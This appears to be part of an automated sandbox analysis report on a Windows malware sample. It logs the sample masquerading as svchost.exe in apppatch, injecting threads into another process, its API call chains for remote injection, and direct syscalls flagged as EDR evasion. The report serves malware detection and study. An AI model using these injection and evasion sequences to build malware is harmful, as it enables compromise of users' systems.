Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1420000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1550000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 770000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1460000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1120000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1210000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 8D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 620000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 930000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	0_2_00401580
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	2_2_00401580
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C93240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	2_2_02C93240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01763240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	6_2_01763240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03123240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	7_2_03123240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01543240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	10_2_01543240

Creates a thread in another existing process (thread injection)

Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 16E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2FA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 14C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2921360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2791360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2651360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 5E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2B91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2D11360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2791360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: BD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe EIP: 2201360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2471360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 13D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2861360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2CA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2471360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1561360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: E51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: AD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2231360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2151360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 9F1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 15A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 26D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2741360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1071360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 29D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: C31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 11F1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 27C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 28E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: EE1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: BF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DC1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1321360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1621360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 951360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 14A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 801360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 761360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1311360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: C41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 821360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: A71360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1041360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 11C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1501360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1421360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1551360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 771360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: BF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1461360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 10F1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 801360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: A11360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 12A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: F91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1121360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 13A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 10C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: FB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1031360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1211360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: AC1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 8D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: E01360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 621360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: A41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 801360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1191360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1031360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 931360	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtUnmapViewOfSection: Direct from: 0x77382D3C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtEnumerateKey: Direct from: 0x77382DBC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtWriteFile: Direct from: 0x77382AFC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetInformationFile: Direct from: 0x77382D0C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtSetInformationThread: Direct from: 0x77382ECC	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtAllocateVirtualMemory: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	NtQueryValueKey: Direct from: 0x77382BEC
